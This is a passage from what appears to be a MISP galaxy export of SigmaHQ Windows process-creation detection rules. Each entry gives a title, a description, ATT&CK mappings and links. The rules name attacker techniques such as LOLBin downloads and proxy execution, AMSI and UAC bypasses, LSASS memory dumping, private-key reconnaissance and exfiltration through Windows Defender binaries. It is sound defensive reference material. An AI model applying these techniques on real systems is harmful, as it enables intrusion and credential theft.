https://lolbas-project.github.io/lolbas/Binaries/Msedge/

https://taggart-tech.com/quasar-electron/

https://positive.security/blog/ms-officecmd-rce

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_electron_app_children.yml

Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script

Detects execution of "VMwareToolBoxCmd.exe" with the "script" and "set" flags to set up a script located in a potentially suspicious location to run on a specific VM state change

The tag is: misp-galaxy:sigma-rules="Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script"

Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10617. Table References

Links

https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml

Potential Persistence Via Powershell Search Order Hijacking - Task

Detects suspicious PowerShell execution via a scheduled task where the command ends with suspicious flags that hide the PowerShell instance instead of executing scripts or commands. This could be a sign of persistence via the PowerShell "Get-Variable" technique as seen being used by Colibri Loader

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Powershell Search Order Hijacking - Task"

Potential Persistence Via Powershell Search Order Hijacking - Task has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10618. Table References

Links

https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_powershell_persistence.yml

HackTool - PCHunter Execution

Detects suspicious use of PCHunter, a tool similar to Process Hacker used to view and manipulate processes, kernel options and other low-level system internals

The tag is: misp-galaxy:sigma-rules="HackTool - PCHunter Execution"

HackTool - PCHunter Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

Table 10619. Table References

Links

https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/

http://www.xuetr.com/

https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_pchunter.yml

Invoke-Obfuscation STDIN+ Launcher

Detects Obfuscated use of stdin to execute PowerShell

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation STDIN+ Launcher"

Invoke-Obfuscation STDIN+ Launcher has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10620. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_stdin.yml

Local Accounts Discovery

Detects local account and System Owner/User discovery using operating system utilities

The tag is: misp-galaxy:sigma-rules="Local Accounts Discovery"

Local Accounts Discovery has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

Table 10621. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_local_system_owner_account_discovery.yml

File Download Via Windows Defender MpCmpRun.EXE

Detects the use of Windows Defender MpCmdRun.EXE to download files

The tag is: misp-galaxy:sigma-rules="File Download Via Windows Defender MpCmpRun.EXE"

File Download Via Windows Defender MpCmpRun.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10622. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/

https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mpcmdrun_download_arbitrary_file.yml

Arbitrary Shell Command Execution Via Settingcontent-Ms

The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.

The tag is: misp-galaxy:sigma-rules="Arbitrary Shell Command Execution Via Settingcontent-Ms"

Arbitrary Shell Command Execution Via Settingcontent-Ms has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="User Execution - T1204" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

Table 10623. Table References

Links

https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml

New Process Created Via Wmic.EXE

Detects new process creation using WMIC via the "process call create" flag

The tag is: misp-galaxy:sigma-rules="New Process Created Via Wmic.EXE"

New Process Created Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 10624. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/84215139ee5127f8e3a117e063b604812bd71928/atomics/T1047/T1047.md#atomic-test-5---wmi-execute-local-process

https://www.sans.org/blog/wmic-for-incident-response/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_process_creation.yml

Suspicious IIS URL GlobalRules Rewrite Via AppCmd

Detects usage of "appcmd" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.

The tag is: misp-galaxy:sigma-rules="Suspicious IIS URL GlobalRules Rewrite Via AppCmd"

Table 10625. Table References

Links

https://learn.microsoft.com/en-us/answers/questions/739120/how-to-add-re-write-global-rule-with-action-type-r

https://twitter.com/malmoeb/status/1616702107242971144

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml

Potential AMSI Bypass Via .NET Reflection

Detects Request to "amsiInitFailed" that can be used to disable AMSI Scanning

The tag is: misp-galaxy:sigma-rules="Potential AMSI Bypass Via .NET Reflection"

Potential AMSI Bypass Via .NET Reflection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10626. Table References

Links

https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/

https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_amsi_init_failed_bypass.yml

Reg Add Suspicious Paths

Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys

The tag is: misp-galaxy:sigma-rules="Reg Add Suspicious Paths"

Reg Add Suspicious Paths has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10627. Table References

Links

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md

https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_susp_paths.yml

Malicious PE Execution by Microsoft Visual Studio Debugger

The MS VS Just-In-Time Debugger "vsjitdebugger.exe" has an option to launch a specified executable and attach a debugger. Adversaries may use this option to execute malicious code via a signed, verified binary. The debugger is installed alongside the Microsoft Visual Studio package.

The tag is: misp-galaxy:sigma-rules="Malicious PE Execution by Microsoft Visual Studio Debugger"

Malicious PE Execution by Microsoft Visual Studio Debugger has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10628. Table References

Links

https://twitter.com/pabraeken/status/990758590020452353

https://docs.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml

Schtasks From Suspicious Folders

Detects scheduled task creations that have suspicious action command and folder combinations

The tag is: misp-galaxy:sigma-rules="Schtasks From Suspicious Folders"

Schtasks From Suspicious Folders has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 10629. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_folder_combos.yml

Delete All Scheduled Tasks

Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.

The tag is: misp-galaxy:sigma-rules="Delete All Scheduled Tasks"

Delete All Scheduled Tasks has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"

Table 10630. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-delete

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_delete_all.yml

Hidden Powershell in Link File Pattern

Detects events that appear when a user clicks on a link file containing a PowerShell command

The tag is: misp-galaxy:sigma-rules="Hidden Powershell in Link File Pattern"

Hidden Powershell in Link File Pattern has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10631. Table References

Links

https://www.x86matthew.com/view_post?id=embed_exe_lnk

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_embed_exe_lnk.yml

Node Process Executions

Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud

The tag is: misp-galaxy:sigma-rules="Node Process Executions"

Node Process Executions has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

Table 10632. Table References

Links

https://twitter.com/mttaggart/status/1511804863293784064

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_node_adobe_creative_cloud_abuse.yml

Potential CobaltStrike Process Patterns

Detects potential process patterns related to Cobalt Strike beacon activity

The tag is: misp-galaxy:sigma-rules="Potential CobaltStrike Process Patterns"

Potential CobaltStrike Process Patterns has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10633. Table References

Links

https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/

https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_process_patterns.yml

Process Memory Dump via RdrLeakDiag.EXE

Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory

The tag is: misp-galaxy:sigma-rules="Process Memory Dump via RdrLeakDiag.EXE"

Process Memory Dump via RdrLeakDiag.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10635. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Rdrleakdiag/

https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/

https://twitter.com/0gtweet/status/1299071304805560321?s=21

https://www.pureid.io/dumping-abusing-windows-credentials-part-1/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml

Suspicious Download From Direct IP Via Bitsadmin

Detects usage of bitsadmin downloading a file using a URL that contains an IP address

The tag is: misp-galaxy:sigma-rules="Suspicious Download From Direct IP Via Bitsadmin"

Suspicious Download From Direct IP Via Bitsadmin has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 10636. Table References

Links

https://isc.sans.edu/diary/22264

https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/

https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin

https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_direct_ip.yml

PsExec Service Child Process Execution as LOCAL SYSTEM

Detects suspicious launch of the PSEXESVC service on this system and a child process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with the highest privileges and not only the privileges of the logged-in user account (e.g. the administrator account)

The tag is: misp-galaxy:sigma-rules="PsExec Service Child Process Execution as LOCAL SYSTEM"

Table 10637. Table References

Links

https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psexesvc_as_system.yml

Suspicious Mshta.EXE Execution Patterns

Detects suspicious mshta process execution patterns

The tag is: misp-galaxy:sigma-rules="Suspicious Mshta.EXE Execution Patterns"

Suspicious Mshta.EXE Execution Patterns has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

Table 10638. Table References

Links

https://www.echotrail.io/insights/search/mshta.exe

https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/

https://en.wikipedia.org/wiki/HTML_Application

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml

Suspicious File Encoded To Base64 Via Certutil.EXE

Detects the execution of certutil with the "encode" flag to encode a file to base64 where the extension of the file is suspicious

The tag is: misp-galaxy:sigma-rules="Suspicious File Encoded To Base64 Via Certutil.EXE"

Suspicious File Encoded To Base64 Via Certutil.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10639. Table References

Links

https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior

https://www.virustotal.com/gui/file/34de4c8beded481a4084a1fd77855c3e977e8ac643e5c5842d0f15f7f9b9086f/behavior

https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior

https://www.virustotal.com/gui/file/4abe1395a09fda06d897a9c4eb247278c1b6cddda5d126ce5b3f4f499e3b8fa2/behavior

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml

Dynamic .NET Compilation Via Csc.EXE

Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.

The tag is: misp-galaxy:sigma-rules="Dynamic .NET Compilation Via Csc.EXE"

Dynamic .NET Compilation Via Csc.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Compile After Delivery - T1027.004" with estimative-language:likelihood-probability="almost-certain"

Table 10640. Table References

Links

https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/

https://twitter.com/gN3mes1s/status/1206874118282448897

https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf

https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/

https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1027.004/T1027.004.md#atomic-test-1---compile-after-delivery-using-cscexe

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml

SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code

Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs

The tag is: misp-galaxy:sigma-rules="SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code"

SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Script Proxy Execution - T1216" with estimative-language:likelihood-probability="almost-certain"

Table 10641. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml

Execution via stordiag.exe

Detects the use of stordiag.exe to execute schtasks.exe, systeminfo.exe and fltmc.exe

The tag is: misp-galaxy:sigma-rules="Execution via stordiag.exe"

Execution via stordiag.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10642. Table References

Links

https://twitter.com/eral4m/status/1451112385041911809

https://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_stordiag_susp_child_process.yml

PUA - NirCmd Execution As LOCAL SYSTEM

Detects the use of NirCmd tool for command execution as SYSTEM user

The tag is: misp-galaxy:sigma-rules="PUA - NirCmd Execution As LOCAL SYSTEM"

PUA - NirCmd Execution As LOCAL SYSTEM has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 10643. Table References

Links

https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/

https://www.nirsoft.net/utils/nircmd2.html#using

https://www.nirsoft.net/utils/nircmd.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nircmd_as_system.yml

Application Removed Via Wmic.EXE

Detects the uninstallation of an application with wmic

The tag is: misp-galaxy:sigma-rules="Application Removed Via Wmic.EXE"

Application Removed Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 10644. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-10---application-uninstall-using-wmic

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_uninstall_application.yml

Private Keys Reconnaissance Via CommandLine Tools

Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials

The tag is: misp-galaxy:sigma-rules="Private Keys Reconnaissance Via CommandLine Tools"

Private Keys Reconnaissance Via CommandLine Tools has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"

Table 10645. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.004/T1552.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_private_keys_recon.yml

Changing Existing Service ImagePath Value Via Reg.EXE

Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in Registry permissions to redirect from the originally specified executable to one that they control, in order to launch their own code at service start. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services

The tag is: misp-galaxy:sigma-rules="Changing Existing Service ImagePath Value Via Reg.EXE"

Changing Existing Service ImagePath Value Via Reg.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Services Registry Permissions Weakness - T1574.011" with estimative-language:likelihood-probability="almost-certain"

Table 10646. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_service_imagepath_change.yml

Potentially Suspicious Child Process Of ClickOnce Application

Detects potentially suspicious child processes of a ClickOnce deployment application

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Child Process Of ClickOnce Application"

Table 10647. Table References

Links

https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dfsvc_suspicious_child_processes.yml

Suspicious ConfigSecurityPolicy Execution

Detects file upload, credential or data exfiltration via a binary that is part of Windows Defender

The tag is: misp-galaxy:sigma-rules="Suspicious ConfigSecurityPolicy Execution"

Suspicious ConfigSecurityPolicy Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Web Service - T1567" with estimative-language:likelihood-probability="almost-certain"

Table 10648. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml

Audit Policy Tampering Via NT Resource Kit Auditpol

Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.

The tag is: misp-galaxy:sigma-rules="Audit Policy Tampering Via NT Resource Kit Auditpol"

Audit Policy Tampering Via NT Resource Kit Auditpol has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 10649. Table References

Links

https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Windows%202000%20Resource%20Kit%20Tools/AuditPol

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_auditpol_nt_resource_kit_usage.yml

Bypass UAC via Fodhelper.exe

Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.

The tag is: misp-galaxy:sigma-rules="Bypass UAC via Fodhelper.exe"

Bypass UAC via Fodhelper.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10650. Table References

Links

https://eqllib.readthedocs.io/en/latest/analytics/e491ce22-792f-11e9-8f5c-d46d6d62a49e.html

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_fodhelper.yml

Application Whitelisting Bypass via Dnx.exe

Execute C# code located in the consoleapp folder

The tag is: misp-galaxy:sigma-rules="Application Whitelisting Bypass via Dnx.exe"

Application Whitelisting Bypass via Dnx.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Compile After Delivery - T1027.004" with estimative-language:likelihood-probability="almost-certain"

Table 10651. Table References

Links

https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dnx.yml

Windows Kernel Debugger Execution

Detects execution of the Windows Kernel Debugger "kd.exe".

The tag is: misp-galaxy:sigma-rules="Windows Kernel Debugger Execution"

Table 10652. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_kd_execution.yml

Potential Dosfuscation Activity

Detects possible payload obfuscation via the commandline

The tag is: misp-galaxy:sigma-rules="Potential Dosfuscation Activity"

Potential Dosfuscation Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10653. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf

https://github.com/danielbohannon/Invoke-DOSfuscation

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_dosfuscation.yml

Suspicious Calculator Usage

Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion.

The tag is: misp-galaxy:sigma-rules="Suspicious Calculator Usage"

Suspicious Calculator Usage has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 10654. Table References

Links

https://twitter.com/ItsReallyNick/status/1094080242686312448

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_calc_uncommon_exec.yml

Potential ReflectDebugger Content Execution Via WerFault.EXE

Detects execution of "WerFault.exe" with the "-pr" commandline flag, which is used to run files stored in the ReflectDebugger key. That key could be used to store the path to the malware in order to masquerade the execution flow.

The tag is: misp-galaxy:sigma-rules="Potential ReflectDebugger Content Execution Via WerFault.EXE"

Potential ReflectDebugger Content Execution Via WerFault.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 10655. Table References

Links

https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html

https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_werfault_reflect_debugger_exec.yml

Potential Encoded PowerShell Patterns In CommandLine

Detects specific combinations of encoding methods in PowerShell via the commandline

The tag is: misp-galaxy:sigma-rules="Potential Encoded PowerShell Patterns In CommandLine"

Potential Encoded PowerShell Patterns In CommandLine has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10656. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_encoding_patterns.yml

Dropping Of Password Filter DLL

Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS

The tag is: misp-galaxy:sigma-rules="Dropping Of Password Filter DLL"

Dropping Of Password Filter DLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Password Filter DLL - T1556.002" with estimative-language:likelihood-probability="almost-certain"

Table 10657. Table References

Links

https://github.com/3gstudent/PasswordFilter/tree/master/PasswordFilter

https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_credential_access_via_password_filter.yml

System Network Connections Discovery Via Net.EXE

Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.

The tag is: misp-galaxy:sigma-rules="System Network Connections Discovery Via Net.EXE"

System Network Connections Discovery Via Net.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

Table 10658. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_use_network_connections_discovery.yml

Potential ShellDispatch.DLL Functionality Abuse

Detects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute"

The tag is: misp-galaxy:sigma-rules="Potential ShellDispatch.DLL Functionality Abuse"

Table 10659. Table References

Links

